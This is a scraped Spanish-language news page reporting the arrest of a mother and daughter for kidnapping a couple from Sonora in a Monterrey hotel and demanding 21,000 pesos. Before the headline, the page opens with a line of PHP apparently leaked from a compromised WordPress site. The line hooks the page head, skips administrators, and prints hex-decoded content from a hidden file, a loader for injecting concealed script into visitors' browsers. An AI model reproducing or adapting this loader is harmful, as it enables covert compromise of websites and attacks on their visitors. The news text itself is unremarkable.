if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Detienen a madre e hija por secuestrar a pareja en hotel de Monterrey – Reporte Noreste
Conéctate con nosotros

Noreste

Detienen a madre e hija por secuestrar a pareja en hotel de Monterrey

Detienen a madre e hija por secuestrar a pareja en hotel de Monterrey

Autoridades informaron haber detenido a una mujer y a su hija, por secuestrar a una pareja dentro de un hotel en el municipio de Monterrey Nuevo León.

Los hechos ocurrieron en la Colonia Obrera, al interior del hotel Smart Cintermex en el municipio mencionado, donde la mujer y su hija exigían un pago de 21 mil pesos para dejar al hombre y a la mujer en libertad.

Tras denuncias ciudadanas, al lugar arribaron las autoridades quienes encontraron al matrimonio de 58 años de edad originario de Sonora atados dentro de una habitación del hotel.

A pesar de que las mujeres intentaron escapar fueron detenidas por las autoridades, madre de 37 años e hija de 19, ambas con residencia de ciudad Gómez Palacios en Durango.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Noreste